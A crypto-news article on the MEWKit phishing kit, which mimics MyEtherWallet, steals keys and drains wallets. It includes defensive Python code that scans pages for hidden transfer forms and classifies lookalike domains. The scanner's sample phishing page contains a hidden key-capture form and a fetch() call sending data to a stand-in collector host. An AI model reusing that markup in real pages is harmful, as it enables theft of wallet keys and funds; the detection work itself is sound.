MEWKit: New Malware Drains Ethereum Wallets Automatically
According to security research firm RiskIQ, a criminal group has built a phishing kit with an Automated Transfer System (ATS) that empties MyEtherWallet (MEW) Ethereum wallets without the victim noticing.
MEWKit Phishing Attack
MEWKit is the name RiskIQ gave to the new phishing kit. It imitates the front end of MyEtherWallet (an open source project) with the aim of stealing the funds in the victim's wallet.
According to the researchers, the actors have automated the transfer step: the details captured by the fake page are used to move funds out automatically, and accounts are reportedly drained as soon as a victim unlocks (decrypts) a wallet on the fake page. Because the actors also capture the victim's private key, they remain able to steal any funds later sent to that address for as long as the compromise goes unnoticed; a stolen key cannot be rotated, so the only remedy is to move whatever remains to a freshly generated wallet.
The scam uses scripts that build the transfer and press the send button just as a legitimate user would, while the elements involved are kept hidden from view. The MEWKit back end lets the operators keep track of the ether stolen and of the private keys captured.
Display: None (hidden) function to maliciously send ether. Source: RiskIQ Report
MyEtherWallet appears to be the most affected wallet because it is simple to use and has no server-side controls that could detect scripts injected into an active web session. Unlike a bank, which can flag or hold a suspicious transfer, the wallet is a client-side interface that gives users direct access to the Ethereum network: whoever holds the key can broadcast a transaction, and no intermediary can reverse it. That design is what MEWKit leverages once it has captured the victim's wallet credentials (keystore file and password, or the private key itself).
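The two page-side indicators described above (a transfer form concealed with display:none and script or form targets that leave the wallet's own origin) can be checked mechanically on a saved copy of a suspect page. The scanner below is an added example written for this article; it is not RiskIQ's or MyEtherWallet's code. The sample pages, the host collector.example.net, the trusted-host list and the list of sensitive field names are all constructed assumptions for the illustration.

```python
"""Scan saved wallet-page HTML for MEWKit-style indicators:
hidden (display:none) subtrees carrying a transfer form or key fields,
and script/form targets pointing off the wallet's own origin.
Added example, not RiskIQ's or MyEtherWallet's code; all hosts, field
names and sample pages below are constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the genuine page only talks to its own origin.
TRUSTED_HOSTS = {"myetherwallet.com", "www.myetherwallet.com"}
# Assumption: field names that suggest key capture or a transfer form.
SENSITIVE_MARKERS = ("privkey", "privatekey", "private_key", "sendtx",
                     "transfer", "to_address", "toaddress", "amount")
VOID_TAGS = {"input", "img", "br", "hr", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def _off_origin(url):
    """Host of an absolute URL if it is not a trusted wallet host, else None."""
    host = urlparse(url).hostname
    if host and host.lower() not in TRUSTED_HOSTS:
        return host.lower()
    return None


def _is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "hidden" in attrs


class MEWKitScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._stack = []        # one bool per open non-void element: hidden?
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v if v is not None else "") for k, v in attrs}
        hidden_here = _is_hidden(attrs)
        concealed = hidden_here or any(self._stack)
        if tag not in VOID_TAGS:
            self._stack.append(hidden_here)
        if tag == "form":
            host = _off_origin(attrs.get("action", ""))
            if host:
                self.findings.append(f"form posts off-origin to {host}")
            if concealed:
                self.findings.append("hidden form (display:none) present")
        elif tag == "input" and concealed:
            name = (attrs.get("name") or attrs.get("id") or "").lower()
            if any(m in name for m in SENSITIVE_MARKERS):
                self.findings.append(f"hidden input '{name}' inside concealed subtree")
        elif tag == "script":
            self._in_script = True
            host = _off_origin(attrs.get("src", ""))
            if host:
                self.findings.append(f"external script loaded from {host}")

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if tag == "script":
            self._in_script = False
        if self._stack:
            self._stack.pop()

    def handle_data(self, data):
        # Inline script bodies: flag any absolute URL that leaves the origin.
        if self._in_script:
            for url in URL_RE.findall(data):
                host = _off_origin(url)
                if host:
                    self.findings.append(f"inline script references {host}")


def scan_page(html):
    """Return the list of MEWKit-style findings for one page; [] means clean."""
    scanner = MEWKitScanner()
    scanner.feed(html)
    return scanner.findings


# Constructed sample: a fake unlock page with a concealed auto-transfer form.
SAMPLE_PHISH = """
<html><body>
<form id="unlock" action="/">
  <input type="file" name="keystore"><input type="password" name="unlockpass">
</form>
<div style="display: none">
  <form id="sendtx" action="https://collector.example.net/drop">
    <input name="to_address" value="0x0000000000000000000000000000000000000000">
    <input name="amount"><input name="privkey">
  </form>
</div>
<script src="https://collector.example.net/ats.js"></script>
<script>
  // constructed: the hypothetical trigger that fires once the wallet is unlocked
  document.getElementById('unlock').addEventListener('submit', function () {
    fetch('https://collector.example.net/key', {method: 'POST'});
  });
</script>
</body></html>
"""

# Constructed sample: a page that only talks to its own origin.
SAMPLE_CLEAN = """
<html><body>
<form id="unlock" action="/"><input type="password" name="unlockpass"></form>
<script src="https://www.myetherwallet.com/js/app.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PHISH):
        print("PHISH:", finding)
    print("CLEAN:", scan_page(SAMPLE_CLEAN))
```

Run it against a page saved with the browser's "save page" function (or fetched with curl) rather than the live DOM; the scanner is a triage aid and a hidden subtree can also be produced at runtime by a script, which static parsing will not see.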
Phishing Prevention Tips. Source: MyEtherWallet
The most recent attack involving MEWKit took place on April 24, 2018, when the criminals hijacked the internet routes for Amazon's Route 53 DNS service so that lookups for myetherwallet.com were answered by a server they controlled. From this man-in-the-middle position they sent visitors to a lookalike page (served with a certificate that browsers flagged as invalid) and walked away with roughly $152,000 in ether.
The criminals have also paid for Google AdWords placements so that their phishing page appears for the search keyword 'myetherwallet.'
The first two links (ads) are phishing sites.
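Paid ads and hijacked links both depend on the victim accepting a domain that merely resembles myetherwallet.com. The classifier below, an added example written for this article (not RiskIQ's or MyEtherWallet's code), checks a URL or hostname against the genuine domain for the three common tricks: homoglyphs in internationalised domain names, one- or two-character typos, and the brand name embedded in some other registrable domain. Its confusables table is a small constructed subset rather than the full Unicode confusables list, and the "last two labels" rule for the registrable domain ignores the Public Suffix List; both are simplifying assumptions.

```python
"""Classify a URL or hostname against the genuine wallet domain.
Added example, not RiskIQ's or MyEtherWallet's code. The confusables
table and the registrable-domain rule are simplifying assumptions."""
import unicodedata
from urllib.parse import urlparse

LEGIT_DOMAIN = "myetherwallet.com"
BRAND = LEGIT_DOMAIN.split(".")[0]

# Constructed subset of Cyrillic/Greek/Latin-extended letters that render like
# basic Latin ones; the real Unicode confusables list is far larger.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u03bf": "o", "\u03b1": "a", "\u0131": "i", "\u0142": "l",
}


def hostname_of(target):
    """Accept a bare host or a full URL; return the lowercase host with
    punycode (xn--) labels decoded back to Unicode."""
    if "://" not in target:
        target = "//" + target          # lets urlparse see a netloc
    host = (urlparse(target).hostname or "").lower().rstrip(".")
    labels = []
    for label in host.split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass                    # undecodable label: keep it raw
        labels.append(label)
    return ".".join(labels)


def skeleton(host):
    """Fold lookalike characters to ASCII so visually identical names compare equal."""
    out = []
    for ch in unicodedata.normalize("NFKD", host):
        if unicodedata.combining(ch):   # drop accents left by NFKD
            continue
        out.append(CONFUSABLES.get(ch, ch))
    return "".join(out)


def levenshtein(a, b):
    """Edit distance; a distance of 1 or 2 from the brand is a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    # Assumption: no Public Suffix List, so "last two labels" stands in for
    # the registrable domain (wrong for co.uk-style suffixes).
    return ".".join(host.split(".")[-2:])


def classify(target, legit=LEGIT_DOMAIN):
    """Return one of: legitimate, homoglyph, typosquat, embedded brand,
    unrelated, invalid."""
    host = hostname_of(target)
    if not host:
        return "invalid"
    reg = registrable(host)
    reg_skel = registrable(skeleton(host))
    if reg == legit:
        return "legitimate"
    if reg_skel == legit:
        return "homoglyph"          # same picture, different code points
    if levenshtein(reg_skel, legit) <= 2:
        return "typosquat"
    if BRAND in skeleton(host):
        return "embedded brand"     # e.g. myetherwallet.com.login.example
    return "unrelated"


if __name__ == "__main__":
    # Constructed inputs; the Cyrillic 'е' (U+0435) stands in for Latin 'e'.
    for t in ("https://www.myetherwallet.com/", "my\u0435therwallet.com",
              "myetherwalet.com", "http://myetherwallet.com.secure-login.example/",
              "example.com"):
        print(f"{t!r:55} -> {classify(t)}")
```

The decisive check is done on the registrable domain, not the full host: a phishing host such as myetherwallet.com.secure-login.example contains the genuine name verbatim, which is exactly why the last two labels are compared first and the brand-substring test runs last.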
The Russian Connection
No fix has so far been offered for the phishing attack, which threatens to get out of hand given how exposed MyEtherWallet users are. RiskIQ advises everyone with a wallet to be extra careful when using the platform, and in particular to check the URL before unlocking a wallet.
The perpetrators of the attack appear to have been operating for quite some time, but it is still unclear how many people have fallen prey or how much has been stolen so far. The attackers' identity is also unknown, although the location of some of the IP addresses uncovered by the security research firm suggests they could be based in Russia.
The phishing of MyEtherWallet users underscores the need to choose a wallet with added layers of security if one wants to be on the safe side when handling digital currencies.
The attack also shows that actors are slowly shifting their attention away from cryptocurrency exchanges, which have been under attack for some time. Early in 2018, the Japanese exchange Coincheck suffered a significant breach in which roughly $500 million worth of NEM tokens was stolen.
BTCManager advises its readers to use hardware wallets like Ledger and Trezor whenever possible, as they are more secure than online wallets: the private key never leaves the device, and the device displays the destination address and amount for the user to confirm before signing, which is precisely the step a hidden transfer script is designed to skip.